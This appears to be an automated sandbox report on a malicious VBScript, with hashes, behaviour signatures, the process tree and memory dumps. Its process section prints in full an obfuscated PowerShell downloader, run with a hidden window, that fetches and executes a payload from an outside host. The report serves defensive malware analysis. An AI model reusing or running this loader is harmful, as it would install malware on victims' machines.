Analysis

  • max time kernel
    146s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/06/2024, 13:22

General

  • Target

    033MSOG241591GHD.out.vbs

  • Size

    22KB

  • MD5

    59466d59d80a2429567c23520135b4b6

  • SHA1

    13453bf0b8f5b716ad554afed8f8acbf0cb65403

  • SHA256

    c2ad492e30a53307f299b6694e479e0d55d0c6e3505c1d7929366e905aab3d9a

  • SHA512

    77187a4174d6bc47935aa5962a72cbacf629f1927133879c9957850ca5178e96485cf5dccb3e95b994128b02346a1454c3c6e80b553f7c8f8b207560fc491bf3

  • SSDEEP

    384:9Ru1EJgdf/HWD4Zx4vBlxSrfsy1E90TOntMQQ0hkCJUjdxmW:9Ru1NF/WDMxE/xSrfsL90ynK6ZJQxX

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033MSOG241591GHD.out.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden "$Vurderingsmndene = 1;Function Corbin($overcools){$Tristimulus=$overcools.Length-$Vurderingsmndene;$Bulgy='Substring';For( $Oliekilde17=4;$Oliekilde17 -lt $Tristimulus;$Oliekilde17+=5){$Selfsustainingly+=$overcools.$Bulgy.Invoke( $Oliekilde17, $Vurderingsmndene);}$Selfsustainingly;}function Digitaliser($Fractioning){ & ($Hverne) ($Fractioning);}$Distributrnet=Corbin 'SnapMUnino ParzForeiD,mblmicrlCha,a,jel/Pese5Nucl. Ri,0M.sa Afri(Bei.W BraiUnprnBjniddykkoPenswOve.sprov AfleNnrvrT ove Hedo1 Tri0 ,rk. Fav0bibl; xtr MantWAulei LocnCrat6Uhol4 Lun;Udgi Chufx Rav6Dirk4M ll;Phyl TulirL,erv,kan:Bar,1Reko2 ,av1Stnk.Radi0Slam)Mutt Pan,GTaoie B.wcC,emkStilo Te./Cinc2Bloo0e gl1Dila0mice0Apri1Gods0Ly,r1Bent IndFI.ogiHensrforbeStavfDideoF.agxdism/ G.y1U.nn2 ill1Bort. amb0Stri ';$Admen=Corbin ' Va UKerasFreseGouvrrasp-Gen.Abootg DeleJulenNurst,upe ';$Beerily=Corbin 'EvighPurstovertI.tepLovb:Mode/Beed/C,ese SteqNobeu fleiUnwhpP.sse KonsEa lgInten katSwit.MusisBreva ,pr.Munkc Ty.oltn mRest/ HypBUn rrN taa,ustnSalgdSo.sbposto HlsmGen,bB gieNe fsR gi.,isahpreahFunnk cym ';$Graduerende156=Corbin 'Pseu> Ava ';$Hverne=Corbin 'Sh.cimisseTensx hjt ';$Retrospektions='Gslings';$Adverbialize = Corbin 'BuseeresocselvhWardoOkku Fi,a%Org aBargpT.bup Deldops.a,nmat FinaPrek% Sl.\MiniS Ta t,roniSerolFoollDetaestrblBog.eStrig bi,sPost.Skriu,nkyl D,bvBeta Orga&Ndpl&Gips blinehilbcCe,lh AfsoFrav unretHod ';Digitaliser (Corbin 'D,ge$Melog ortl DanoKon,bL.mbapolil Com: ScaTNitraHul nJ.rddMy.mrDo no GendSacrsInefbWid.e Remtdicon .xidOscierenolDirlsUsp.eSubirE.ols Sma=Emb.(R.vfchypem Aktdfl.e Mell/FipscUnfo sids$ ,ogAAfsndJutlv,esmeTotarKancbIngei.reaa Cy l.aryiSlatz Musebr.s)Coun ');Digitaliser (Corbin 'Brkj$OutrgNe rlHoveoPetrbFosfaSpillCont: DysP H.piSkiln UdrlPaapiDrejgSha,=Dent$Sim.BBouneClioeArnor AnhiMicrlCereyUd.v.H rns,ydrpSelvlBrndisvi.tRese(Lini$Nav GCathrUnimaCaped.tilu .eteFluerSalae .ycnTer,dWiree Fre1Came5 ,ke6Buc.)Matt 
');$Beerily=$Pinlig[0];$ustadighedens= (Corbin 'Fash$ MacgGrnslF.kuo Monb ShiaAridlHalf: HilG aute aannMarmn lvee C.nm,avotSk.lrCrepkPr,skWhale KitnF emdJin eUsynsReno= UncN.alae Spewfi.i-DiswOBearbPimpjTaktesplacB votS,ov CandSF gsyPlejs,ilotSvabeSaddm Ton.TornN DameServt H.p. UncWsu,ae Renb olyCOdonlaveriHaireUninn,lomt');$ustadighedens+=$Tandrodsbetndelsers[1];Digitaliser ($ustadighedens);Digitaliser (Corbin 'Isoc$ P aGMaileJerrnHeren egaePuz.mOrtot Knor.uickmystk AlvePol n St dLgehe,abrsPell.Se tHPorgeBrnda anddForee Bder Un.sLap.[He.a$waffA,ysndCacom Pa.e GlonRo o] B,y= Tyd$S,arD,orsih tpsKa.atD,parOm.oi Semb Opsucocrt Untr refnGalee HootVind ');$Tyndvgget=Corbin 'gavs$VectG Sp,e BrsnTrusnLazyedesimStyntU,plr Hagkforck,bseeRe,unHousdAn.ie OnosKo g.IncoDt beoGlauwSukkn fo l KiwotoxiaFiffdTropFComtiHypelB.sie Cla(xe.o$ NriBUne,eSupeeHelbrCisaiHemolAneuy A g,Rhac$Trang repr ForaR innGudeuOverlDrifaTranttechiK.sto Co,nSekseAen.rHystnXra eUnde) non ';$granulationerne=$Tandrodsbetndelsers[0];Digitaliser (Corbin 'skit$kologGldelUndeoEgesbMot.aVestlSemi: MinERes qLoftu begiPrajvSa.moGs.ec livaGrettMa.iiI.puoRac,nrimm=Filt(o.erT,pheeSplksf tit Exc- SupPR oxaStimt,ocohse.i Syvt$in egHolir HolaLyr ndk,iu BedludskaUlpftDeeriArthoI,gan PhyeRe,rr GranPh.teGree)Prep ');while (!$Equivocation) {Digitaliser (Corbin 'Drud$ .ycgAkuplFlago SpobkrlhaReprl Non: P oRFrytaSwahnBumbssp.neSqualMisllRene=Hil,$ ChotS ggr oru,ynseSten ') ;Digitaliser $Tyndvgget;Digitaliser (Corbin ' MotSSynctDrila,enirIndstue f-Nec.S,jrglBuc e,uhae IndpNonm takk4St.r ');Digitaliser (Corbin ' Pa,$Unpag Opsl Si.oTagrbNotaa SemlAmer:VrdiERektqAnt,u.eetiNedsvVandoModec ElvaV,rbtPotoiLit.oFacan,erb=Lydl( FilT Ty,eEntasBri,tmon -IdeaPImpaaDelptUni.hType Bre$ BelgGladrVol,aTokrnKappuForblFontaExpitC,aniVa,ioAnalnPrineMadrrTentnCataeHurl)Haye ') ;Digitaliser (Corbin ' ko,$ToetgSkovlBekro BrnbcaptaNol l Pro: GosG Af.aEle,rrin,dnazeb.issrUdl a ,rdcstereUndl= Mem$ rang GynlSneroUnreb BegaLaudlSnek: 
StiS.urraOprymForhm.efaeUtron issbVampy orgFuntgLucieToaddSh,ien dp+Redn+Clas%Para$bortP E siAumanPhosl PhoiEx eg.yns.Justc PhooSilhu O,knUd.itCrom ') ;$Beerily=$Pinlig[$Gardbrace];}$Guiding=313361;$Hygsom=28928;Digitaliser (Corbin ' nt$Pharg Wrol ViloAfpubObjeaSoftlRost:BeleLBurdaH.venadvod NyhbOp arRke,uSubsgSy,osM tea Nerr QuiePishaPerdlRec eMisar MatsKr.e R st= Sch AutoGM.lte Agit Tig-B,neCHjemo modnK.autFarleSpiknUnbitProd No m$ iorg AfprScypaLingnAcinu LamlSlanaSalmtInoxiO eroaandnRv reSvirrDes n MbleFree ');Digitaliser (Corbin 'Ven,$ AdmgParalImpao Bryb chra,ffil Mil:DiabrMathe G udSprosTyndtBlocaBarmrConct Br,sQuad Filc= Poo udb[SjufSSubayPenssWarlt .nreVannmHybr.,yksCR,seoAfhnnHelivChuceNoncrI,dmt hje]Rese:Impa:Aft FKal,rY,kao .etm Sp.BAnywa.ults.pile Azt6Copp4Pre SQuittR.mmrpedoiCamonEurygMira(Unde$cataL Ni aA,dinHaardProgbCozyr,urtuOua gvangs B ga torrGia,eD,skaPseuludbue,igmr PhasStat)Kals ');Digitaliser (Corbin 'ti.o$BjrngRel l C uoTilsbKanaa.alelSola:RevaDPyraeSharp R,ae Soondibbd Proa ypon .vrtAbdisSkat Til=T.ve Subt[ImmoSFlomyMi isCyphtHesteDatemHyld. DisT UrieY.guxLap,tFals. BukERevonUti.cUdsmoTrandBnk i AftnOmdegPe t]Yder: Hur:GrunA TekSMob.CGolfIun.eILini.FngsG.lute hentS,seSSkogtSjlerGonoi Nonn Sadgg.yc( mes$ PaarOldbeCorodIsotsJon.tB,ndaLigerCompt HarsVild)Abil ');Digitaliser (Corbin 'Udfa$ lgg.nwolSnekoAngobDeseaFiskl Tot: VowAEntogPromgMo.iePeddlSe,ia Indt ,nuiHor.o s.bnWo,d= Aqu$ R cDZongeDeclpBataeContnZonodAbsia.eginDolltTriqsSkam.AoifsWithuHe.abparos mpot,olkrApotisparnRygtga.an( U,t$HjemG uttuD,foiPrimdBlokiSu.gn s.lgCiv.,Sk.v$ SkrH UdsyDi ggShelsToo oBourm Nep)Vrne ');Digitaliser $Aggelation;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
        3⤵
          PID:4164

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3qexmpg.1qj.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/1468-0-0x00007FFE7DD73000-0x00007FFE7DD75000-memory.dmp

            Filesize

            8KB

          • memory/1468-1-0x000001E474540000-0x000001E474562000-memory.dmp

            Filesize

            136KB

          • memory/1468-11-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-12-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-13-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-14-0x00007FFE7DD73000-0x00007FFE7DD75000-memory.dmp

            Filesize

            8KB

          • memory/1468-15-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB

          • memory/1468-16-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp

            Filesize

            10.8MB